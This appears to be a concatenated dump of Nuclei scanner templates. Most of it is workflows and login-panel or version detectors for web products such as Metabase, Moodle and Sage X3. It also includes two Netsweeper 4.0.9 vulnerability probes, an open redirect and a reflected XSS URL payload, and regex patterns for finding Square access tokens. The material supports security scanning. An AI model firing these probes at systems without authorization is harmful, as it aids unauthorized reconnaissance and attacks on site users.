KindEditor Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all KindEditor related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: kindeditor 12 | subtemplates: 13 | - tags: kindeditor -------------------------------------------------------------------------------- /kong-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: kong-workflow 2 | 3 | info: 4 | name: Kong Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Kong related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/kong-detect.yaml 10 | subtemplates: 11 | - tags: kong -------------------------------------------------------------------------------- /lanproxy-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: lanproxy-workflow 2 | 3 | info: 4 | name: Lanproxy Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Lanproxy related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: lanproxy 12 | subtemplates: 13 | - tags: lanproxy -------------------------------------------------------------------------------- /lansweeper-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: lansweeper-workflow 2 | 3 | info: 4 | name: Lansweeper Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Lansweeper related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/lansweeper-login.yaml 10 | subtemplates: 11 | - tags: lansweeper 12 | -------------------------------------------------------------------------------- /laravel-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: laravel-workflow 2 | 3 | info: 4 | name: Laravel Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Laravel related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: laravel 12 | subtemplates: 13 | - tags: laravel -------------------------------------------------------------------------------- /magmi-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: magmi-workflow 2 | 3 | info: 4 | name: MAGMI Security Checks 5 | author: dwisiswant0,daffainfo 6 | description: A simple workflow that runs all MAGMI related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/magmi-detect.yaml 10 | subtemplates: 11 | - tags: magmi -------------------------------------------------------------------------------- /maian-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: maian-workflow 2 | 3 | info: 4 | name: Maian Cart Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Maian Cart related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/maian-cart-detect.yaml 10 | subtemplates: 11 | - tags: maian -------------------------------------------------------------------------------- /manageengine-opmanager.yaml: -------------------------------------------------------------------------------- 1 | id: manageengine-opmanager 2 | 3 | info: 4 | name: ZOHO ManageEngine OpManager 5 | author: dhiyaneshDK,daffainfo 6 | severity: info 7 | reference: 8 | - https://www.manageengine.com/ 9 | metadata: 10 | shodan-query: http.title:"OpManager Plus" 11 | tags: panel,zoho,manageengine 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - '{{BaseURL}}' 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "
" 24 | - "
" 25 | - "
" 26 | condition: and 27 | 28 | - type: status 29 | status: 30 | - 200 31 | -------------------------------------------------------------------------------- /mantisbt-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: mantisbt-workflow 2 | 3 | info: 4 | name: MantisBT Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all MantisBT related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/mantis-detect.yaml 10 | subtemplates: 11 | - tags: mantisbt 12 | -------------------------------------------------------------------------------- /mautic-crm-panel.yaml: -------------------------------------------------------------------------------- 1 | id: mautic-crm-panel 2 | 3 | info: 4 | name: Mautic CRM Panel Login 5 | author: cyllective,daffainfo 6 | severity: info 7 | description: Mautic is a free and open-source marketing automation tool for Content Management, Social Media, Email Marketing, and can be used for the integration of social networks, campaign management, forms, 8 | questionnaires, reports, etc. 9 | reference: 10 | - https://github.com/mautic/mautic 11 | tags: tech,mautic,crm 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - "{{BaseURL}}/s/login" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - 'Mautic' 24 | - 'var mauticBasePath' 25 | condition: and 26 | 27 | - type: status 28 | status: 29 | - 200 30 | -------------------------------------------------------------------------------- /mautic-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: mautic-workflow 2 | 3 | info: 4 | name: Mautic CRM Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Mautic CRM related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/favicon-detection.yaml 10 | matchers: 11 | - name: mautic 12 | subtemplates: 13 | - tags: mautic -------------------------------------------------------------------------------- /metabase-panel.yaml: -------------------------------------------------------------------------------- 1 | id: metabase-panel 2 | 3 | info: 4 | name: Metabase Login Panel 5 | author: revblock,daffainfo 6 | severity: info 7 | description: If a Metabase instance is deployed on the target URL it will return a login page with the version number in the page source 8 | metadata: 9 | shodan-query: http.title:"Metabase" 10 | tags: panel,metabase,login 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/auth/login" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: status 20 | status: 21 | - 200 22 | 23 | - type: word 24 | part: body 25 | words: 26 | - "Metabase" 27 | - "window.MetabaseBootstrap" 28 | - "window.MetabaseRoot" 29 | condition: and 30 | 31 | extractors: 32 | - type: regex 33 | part: body 34 | group: 1 35 | regex: 36 | - '"(v\d+.\d+.\d+)"' 37 | -------------------------------------------------------------------------------- /metabase-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: metabase-workflow 2 | 3 | info: 4 | name: Metabase Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Metabase Pipeline related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/metabase-panel.yaml 10 | subtemplates: 11 | - tags: metabase 12 | -------------------------------------------------------------------------------- /metinfo-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: metinfo-workflow 2 | 3 | info: 4 | name: MetInfo Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all MetInfo related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: metinfo 12 | subtemplates: 13 | - tags: metinfo -------------------------------------------------------------------------------- /microsoft-exchange-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: microsoft-exchange-workflow 2 | 3 | info: 4 | name: Microsoft Exchange Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Microsoft Exchange related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/microsoft/ms-exchange-server.yaml 10 | subtemplates: 11 | - tags: exchange -------------------------------------------------------------------------------- /microstrategy-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: microstrategy-workflow 2 | 3 | info: 4 | name: MicroStrategy Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all MicroStrategy related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/microstrategy-detect.yaml 10 | subtemplates: 11 | - tags: microstrategy -------------------------------------------------------------------------------- /mobileiron-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: mobileiron-workflow 2 | 3 | info: 4 | name: MobileIron Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all MobileIron related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/mobileiron-login.yaml 10 | subtemplates: 11 | - tags: mobileiron -------------------------------------------------------------------------------- /moodle-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: moodle-workflow 2 | 3 | info: 4 | name: Moodle Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Moodle related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: moodle 12 | subtemplates: 13 | - tags: moodle 14 | -------------------------------------------------------------------------------- /netsweeper-open-redirect.yaml: -------------------------------------------------------------------------------- 1 | id: netsweeper-open-redirect 2 | 3 | info: 4 | name: Netsweeper 4.0.9 - Open Redirection 5 | author: daffainfo 6 | severity: medium 7 | description: Netsweeper version 4.0.9 was vulnerable to an Unauthenticated and Authenticated Open Redirect vulnerability. 8 | reference: 9 | - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz 10 | tags: netsweeper,redirect 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://interact.sh/" 16 | 17 | matchers: 18 | - type: regex 19 | part: header 20 | regex: 21 | - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' 22 | -------------------------------------------------------------------------------- /netsweeper-rxss.yaml: -------------------------------------------------------------------------------- 1 | id: netsweeper-rxss 2 | 3 | info: 4 | name: Netsweeper 4.0.9 - Cross-Site Scripting 5 | author: daffainfo 6 | severity: medium 7 | reference: 8 | - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz 9 | tags: netsweeper,xss 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter=' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - '' 22 | 23 | - type: word 24 | part: header 25 | words: 26 | - text/html 27 | 28 | - type: status 29 | status: 30 | - 200 31 | -------------------------------------------------------------------------------- /netsweeper-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: netsweeper-workflow 2 | 3 | info: 4 | name: Netsweeper Security Checks 5 | author: dwisiswant0,daffainfo 6 | description: A simple workflow that runs all netsweeper related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/netsweeper-webadmin-detect.yaml 10 | subtemplates: 11 | - tags: netsweeper -------------------------------------------------------------------------------- /nette-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: nette-workflow 2 | 3 | info: 4 | name: Nette Framework Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Nette Framework related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: nette 12 | subtemplates: 13 | - tags: nette -------------------------------------------------------------------------------- /nginx-version.yaml: -------------------------------------------------------------------------------- 1 | id: nginx-version 2 | 3 | info: 4 | name: Nginx version detect 5 | author: philippedelteil,daffainfo 6 | severity: info 7 | description: Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets. 8 | tags: tech,nginx 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: regex 18 | part: header 19 | regex: 20 | - 'nginx/[0-9.]+' 21 | 22 | - type: status 23 | status: 24 | - 200 25 | 26 | extractors: 27 | - type: regex 28 | part: header 29 | regex: 30 | - 'nginx/[0-9.]+' 31 | -------------------------------------------------------------------------------- /node-red-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: node-red-workflow 2 | 3 | info: 4 | name: Node-RED-Dashboard Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Node-RED-Dashboard related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/node-red-detect.yaml 10 | subtemplates: 11 | - tags: node-red-dashboard 12 | -------------------------------------------------------------------------------- /novnc-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: novnc-workflow 2 | 3 | info: 4 | name: noVNC Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all noVNC related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: novnc 12 | subtemplates: 13 | - tags: novnc -------------------------------------------------------------------------------- /ofbiz-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: ofbiz-workflow 2 | 3 | info: 4 | name: OFBiz Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all OFBiz related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: apache-ofbiz 12 | subtemplates: 13 | - tags: ofbiz 14 | -------------------------------------------------------------------------------- /oneblog-detect.yaml: -------------------------------------------------------------------------------- 1 | id: oneblog-detect 2 | 3 | info: 4 | name: OneBlog Detect 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | tags: tech,oneblog 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | part: body 18 | words: 19 | - 'OneBlog开源博客后台管理系统' 20 | - 'Opencast' 23 | 24 | - type: status 25 | status: 26 | - 200 27 | 28 | # Enhanced by mp on 2022/04/21 29 | -------------------------------------------------------------------------------- /openemr-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: openemr-workflow 2 | 3 | info: 4 | name: OpenEMR Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all OpenEMR related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/openemr-detect.yaml 10 | subtemplates: 11 | - tags: openemr 12 | -------------------------------------------------------------------------------- /opensis-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: opensis-workflow 2 | 3 | info: 4 | name: OpenSIS Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all OpenSIS related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/opensis-panel.yaml 10 | subtemplates: 11 | - tags: opensis 12 | -------------------------------------------------------------------------------- /opensns-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: opensns-workflow 2 | 3 | info: 4 | name: OpenSNS Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all OpenSNS related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/favicon-detection.yaml 10 | matchers: 11 | - name: opensns 12 | subtemplates: 13 | - tags: opensns -------------------------------------------------------------------------------- /oscommerce-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: oscommerce-workflow 2 | 3 | info: 4 | name: osCommerce Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all osCommerce related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: oscommerce 12 | subtemplates: 13 | - tags: oscommerce -------------------------------------------------------------------------------- /pandora-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: pandora-workflow 2 | 3 | info: 4 | name: Pandora FMS Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Pandora FMS related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/pandora-fms-console.yaml 10 | subtemplates: 11 | - tags: pandora 12 | -------------------------------------------------------------------------------- /pega-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: pega-workflow 2 | 3 | info: 4 | name: Pega Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Pega related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/pega-detect.yaml 10 | subtemplates: 11 | - tags: pega 12 | -------------------------------------------------------------------------------- /pentaho-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: pentaho-workflow 2 | 3 | info: 4 | name: Pentaho Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Pentaho related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/pentaho-panel.yaml 10 | subtemplates: 11 | - tags: pentaho 12 | -------------------------------------------------------------------------------- /phpcollab-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: phpcollab-workflow 2 | 3 | info: 4 | name: PhpCollab Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all PhpCollab related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/phpcollab-panel.yaml 10 | subtemplates: 11 | - tags: phpcollab 12 | -------------------------------------------------------------------------------- /phppgadmin-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: phppgadmin-workflow 2 | 3 | info: 4 | name: phpPgAdmin Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all phpPgAdmin related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: phppgadmin 12 | subtemplates: 13 | - tags: phppgadmin -------------------------------------------------------------------------------- /phpwiki-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: phpwiki-workflow 2 | 3 | info: 4 | name: phpwiki Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all phpwiki related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: phpwiki 12 | subtemplates: 13 | - tags: phpwiki -------------------------------------------------------------------------------- /powercreator-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: powercreator-workflow 2 | 3 | info: 4 | name: PowerCreator CMS Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all PowerCreator CMS related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: powercreator 12 | subtemplates: 13 | - tags: powercreator -------------------------------------------------------------------------------- /processmaker-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: processmaker-workflow 2 | 3 | info: 4 | name: ProcessMaker Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all ProcessMaker related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: processmaker 12 | subtemplates: 13 | - tags: processmaker -------------------------------------------------------------------------------- /prometheus-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: prometheus-workflow 2 | 3 | info: 4 | name: Prometheus Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Prometheus related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/prometheus-exposed-panel.yaml 10 | subtemplates: 11 | - tags: prometheus -------------------------------------------------------------------------------- /prtg-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: prtg-workflow 2 | 3 | info: 4 | name: PRTG Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all PRTG related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/prtg-detect.yaml 10 | subtemplates: 11 | - tags: prtg -------------------------------------------------------------------------------- /pulsesecure-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: pulsesecure-workflow 2 | 3 | info: 4 | name: Pulse Connect Secure Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Pulse Connect Secure related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: pulsesecure 12 | subtemplates: 13 | - tags: pulsesecure -------------------------------------------------------------------------------- /qcubed-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: qcubed-workflow 2 | 3 | info: 4 | name: Qcubed Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Qcubed related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: qcubed 12 | subtemplates: 13 | - tags: qcubed -------------------------------------------------------------------------------- /r-seenet-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: r-seenet-workflow 2 | 3 | info: 4 | name: R-SeeNet Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all R-SeeNet related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/rseenet-detect.yaml 10 | subtemplates: 11 | - tags: rseenet 12 | -------------------------------------------------------------------------------- /rancher-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: rancher-workflow 2 | 3 | info: 4 | name: Rancher Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Rancher related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/rancher-panel.yaml 10 | subtemplates: 11 | - tags: rancher 12 | -------------------------------------------------------------------------------- /rconfig-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: rconfig-workflow 2 | 3 | info: 4 | name: rConfig Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all rConfig related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: rconfig 12 | subtemplates: 13 | - tags: rconfig 14 | -------------------------------------------------------------------------------- /remkon-manager-panel.yaml: -------------------------------------------------------------------------------- 1 | id: remkon-manager-panel 2 | 3 | info: 4 | name: Remkon Device Manager Login Panel 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"Remkon Device Manager" 9 | tags: panel,remkon,login 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/login.php' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | 22 | - type: word 23 | part: body 24 | words: 25 | - "Remkon Device Manager" 26 | -------------------------------------------------------------------------------- /ricoh-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: ricoh-workflow 2 | 3 | info: 4 | name: Ricoh Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Ricoh related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/favicon-detection.yaml 10 | matchers: 11 | - name: ricoh 12 | subtemplates: 13 | - tags: ricoh -------------------------------------------------------------------------------- /rosariosis-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: rosariosis-workflow 2 | 3 | info: 4 | name: Rosario Student Information System (rosariosis) Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Rosario Student Information System (rosariosis) related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/rosariosis-detect.yaml 10 | subtemplates: 11 | - tags: rosariosis 12 | -------------------------------------------------------------------------------- /rstudio-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: rstudio-workflow 2 | 3 | info: 4 | name: RStudio Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all RStudio related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/rstudio-detect.yaml 10 | subtemplates: 11 | - tags: rstudio -------------------------------------------------------------------------------- /sage-panel.yaml: -------------------------------------------------------------------------------- 1 | id: sage-panel 2 | 3 | info: 4 | name: Sage X3 Login Panel 5 | author: pikpikcu,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"Sage X3" 9 | tags: panel,sage,login 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/auth/login/page" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - "Sage X3" 22 | - "'/auth/sage-id/registerStart'" 23 | condition: and 24 | 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /saltstack-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: saltstack-workflow 2 | 3 | info: 4 | name: SaltStack Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all SaltStack related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: saltstack 12 | subtemplates: 13 | - tags: saltstack -------------------------------------------------------------------------------- /sarg-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: sarg-workflow 2 | 3 | info: 4 | name: SARG Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all SARG related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: sarg 12 | subtemplates: 13 | - tags: sarg -------------------------------------------------------------------------------- /sco-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: sco-workflow 2 | 3 | info: 4 | name: SCO Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all SCO related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: sco 12 | subtemplates: 13 | - tags: sco -------------------------------------------------------------------------------- /seeddms-panel.yaml: -------------------------------------------------------------------------------- 1 | id: seeddms-panel 2 | 3 | info: 4 | name: SeedDMS Login Panel 5 | author: pussycat0x,daffainfo 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"SeedDMS" 9 | tags: panel,seeddms,login 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php" 15 | - "{{BaseURL}}/dms/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php" 16 | 17 | redirects: true 18 | max-redirects: 2 19 | stop-at-first-match: true 20 | matchers-condition: and 21 | matchers: 22 | - type: word 23 | part: body 24 | words: 25 | - 'href="/out/out.ViewFolder.php">SeedDMS' 26 | - 'href="../out/out.ViewFolder.php?folderid=1">SeedDMS' 27 | condition: or 28 | 29 | - type: status 30 | status: 31 | - 200 -------------------------------------------------------------------------------- /sequoiadb-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: sequoiadb-workflow 2 | 3 | info: 4 | name: SequoiaDB Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all SequoiaDB related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/sequoiadb-login.yaml 10 | subtemplates: 11 | - template: default-logins/sequoiadb/sequoiadb-default-login.yaml 12 | -------------------------------------------------------------------------------- /sharepoint-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: sharepoint-workflow 2 | 3 | info: 4 | name: Microsoft Sharepoint Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Microsoft Sharepoint related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: sharepoint 12 | subtemplates: 13 | - tags: sharepoint -------------------------------------------------------------------------------- /shopxo-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: shopxo-workflow 2 | 3 | info: 4 | name: ShopXO Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all ShopXO related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: shopxo 12 | subtemplates: 13 | - tags: shopxo -------------------------------------------------------------------------------- /sidekiq-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: sidekiq-workflow 2 | 3 | info: 4 | name: Sidekiq Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Sidekiq related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/sidekiq-dashboard.yaml 10 | subtemplates: 11 | - tags: sidekiq 12 | -------------------------------------------------------------------------------- /skywalking-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: skywalking-workflow 2 | 3 | info: 4 | name: Apache SkyWalking Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Apache SkyWalking related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: skywalking 12 | subtemplates: 13 | - tags: skywalking -------------------------------------------------------------------------------- /solr-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: solr-workflow 2 | 3 | info: 4 | name: Apache Solr Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Apache Solr related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/solr-exposure.yaml 10 | subtemplates: 11 | - tags: solr 12 | -------------------------------------------------------------------------------- /sonarqube-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: sonarqube-workflow 2 | 3 | info: 4 | name: SonarQube Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all SonarQube related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/sonarqube-login.yaml 10 | subtemplates: 11 | - tags: sonarqube -------------------------------------------------------------------------------- /sourcebans-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: sourcebans-workflow 2 | 3 | info: 4 | name: SourceBans Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all SourceBans related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: sourcebans 12 | subtemplates: 13 | - tags: sourcebans -------------------------------------------------------------------------------- /splunk-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: splunk-workflow 2 | 3 | info: 4 | name: Splink Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Splink related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: splunk 12 | subtemplates: 13 | - tags: splunk -------------------------------------------------------------------------------- /square-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: square-access-token 2 | 3 | info: 4 | name: Square Access Token 5 | author: gaurang,daffainfo 6 | severity: high 7 | tags: token,file,square 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "EAAAE[a-zA-Z0-9_-]{59}" 17 | - "sq0atp-[0-9A-Za-z\\-_]{22}" 18 | -------------------------------------------------------------------------------- /squirrelmail-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: squirrelmail-workflow 2 | 3 | info: 4 | name: SquirrelMail Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all SquirrelMail related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/squirrelmail-login.yaml 10 | subtemplates: 11 | - tags: squirrelmail 12 | -------------------------------------------------------------------------------- /strapi-cms-detect.yaml: -------------------------------------------------------------------------------- 1 | id: strapi-cms-detect 2 | 3 | info: 4 | name: Strapi CMS detect 5 | author: 